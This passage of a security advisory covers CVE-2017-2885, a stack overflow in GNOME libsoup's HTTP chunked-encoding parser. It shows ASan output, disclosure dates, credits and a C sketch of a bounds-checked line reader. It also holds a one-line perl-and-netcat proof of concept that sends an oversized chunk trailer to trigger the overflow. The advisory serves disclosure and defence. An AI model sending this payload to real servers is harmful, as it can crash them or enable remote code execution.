  0x10007fff7680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007fff7690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007fff76a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==119749==ABORTING
```

### Exploit Proof-of-Concept

```
perl -e 'print "GET / HTTP/1.0\r\nTransfer-Encoding: chunked\r\n\r\n1\r\n" . "A"x150 . "\r\n \r\n"' | nc
```

### Timeline

* 2017-08-02 - Vendor Disclosure
* 2017-08-10 - Public Release

### CREDIT

* Discovered by Aleksandar Nikolic of Cisco Talos.
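The unbounded copy described in the advisory, beside the bounded form of the same read, as an added example that is not libsoup's code and not part of the Talos report: a small chunked-body decoder that reads each chunk-size line and each trailing CRLF into a 128-byte stack buffer, the shape of the vulnerable path. `line_length` yields the newline offset the vulnerable code uses as its memcpy count unchanged; `read_line_checked` caps the copy at the destination size and treats a line that cannot fit as a protocol error. All function names, the decoder logic and the two constructed inputs are assumptions; only the 128-byte buffer size and the 151-byte trailer line (149 `A`s plus CRLF following the one-byte chunk) come from the advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>   /* ssize_t */

/* Capacity of the fixed stack buffer each chunk header/trailer line is
 * copied into; 128 matches 'metabuf' in the advisory's ASan frame.
 * Everything else here is a hypothetical stand-in, not libsoup code. */
#define METABUF_SIZE 128

/* Length of the first line in data including its '\n', or 0 if no
 * newline has arrived yet (the offset the vulnerable code copies as-is). */
static size_t line_length(const unsigned char *data, size_t len)
{
    const unsigned char *nl = memchr(data, '\n', len);
    return nl ? (size_t)(nl - data) + 1 : 0;
}

/* Bounded line reader. The bug above copies line_length() bytes without
 * comparing it to the destination; here the copy is capped by cap, and a
 * line that cannot fit is a protocol error (-2) rather than a silent
 * truncation. -1 means "no complete line yet"; that also becomes an
 * error once the pending bytes alone would already fill the buffer. */
static ssize_t read_line_checked(const unsigned char *data, size_t len,
                                 unsigned char *metabuf, size_t cap)
{
    size_t n = line_length(data, len);
    if (n == 0)
        return len >= cap ? -2 : -1;
    if (n > cap)
        return -2;
    memcpy(metabuf, data, n);
    return (ssize_t)n;
}

/* Decode a complete chunked body into out. Returns the decoded length or
 * -1 on malformed input, including overlong header or trailer lines. */
static ssize_t decode_chunked(const unsigned char *body, size_t len,
                              unsigned char *out, size_t outcap)
{
    unsigned char metabuf[METABUF_SIZE];   /* same shape as the real one */
    size_t pos = 0, written = 0;

    for (;;) {
        /* chunk-size line such as "1\r\n" */
        ssize_t n = read_line_checked(body + pos, len - pos,
                                      metabuf, sizeof metabuf);
        if (n <= 0)
            return -1;
        metabuf[n - 1] = '\0';             /* drop '\n' so strtoul stops */
        char *end;
        unsigned long size = strtoul((char *)metabuf, &end, 16);
        if (end == (char *)metabuf)
            return -1;                     /* no hex digits */
        pos += (size_t)n;
        if (size == 0)
            return (ssize_t)written;       /* last-chunk; trailers ignored */
        if (size > len - pos || size > outcap - written)
            return -1;
        memcpy(out + written, body + pos, size);
        written += size;
        pos += size;

        /* the CRLF that must follow chunk data: in the proof of concept
         * 149 'A's precede this newline, a 151-byte line that exceeds the
         * 128-byte buffer and is refused here instead of copied */
        n = read_line_checked(body + pos, len - pos, metabuf, sizeof metabuf);
        if (n != 2 || metabuf[0] != '\r')
            return -1;
        pos += 2;
    }
}

/* Constructed inputs, not captures: a well-formed one-byte chunked body
 * and a body shaped like the advisory's proof of concept. */
static ssize_t demo_valid_body(void)
{
    static const unsigned char body[] = "1\r\nA\r\n0\r\n\r\n";
    unsigned char out[16];
    return decode_chunked(body, sizeof body - 1, out, sizeof out);
}

static ssize_t demo_poc_shaped_body(void)
{
    unsigned char body[3 + 150 + 2], out[16];
    memcpy(body, "1\r\n", 3);
    memset(body + 3, 'A', 150);
    memcpy(body + 153, "\r\n", 2);
    return decode_chunked(body, sizeof body, out, sizeof out);
}

int main(void)
{
    printf("well-formed body: %zd byte(s) decoded\n", demo_valid_body());
    printf("PoC-shaped body: %zd (rejected before any copy)\n", demo_poc_shaped_body());
    return 0;
}
```

The well-formed body decodes to one byte; the PoC-shaped body fails at the trailer line, because the reader compares the 151-byte line against the 128-byte buffer before the memcpy. Rejecting rather than truncating matters: a truncated chunk-size or trailer line would desynchronize the parser from the peer's framing, which is its own class of bug.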
id: SSV:96451
last seen: 2017-11-19
modified: 2017-09-13
published: 2017-09-13
reporter: Root
title: GNOME libsoup HTTP Chunked Encoding Remote Code Execution Vulnerability (CVE-2017-2885)

Talos

id: TALOS-2017-0392
last seen: 2019-05-29
published: 2017-08-10
reporter: Talos Intelligence
source: http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0392
title: GNOME libsoup HTTP Chunked Encoding Remote Code Execution Vulnerability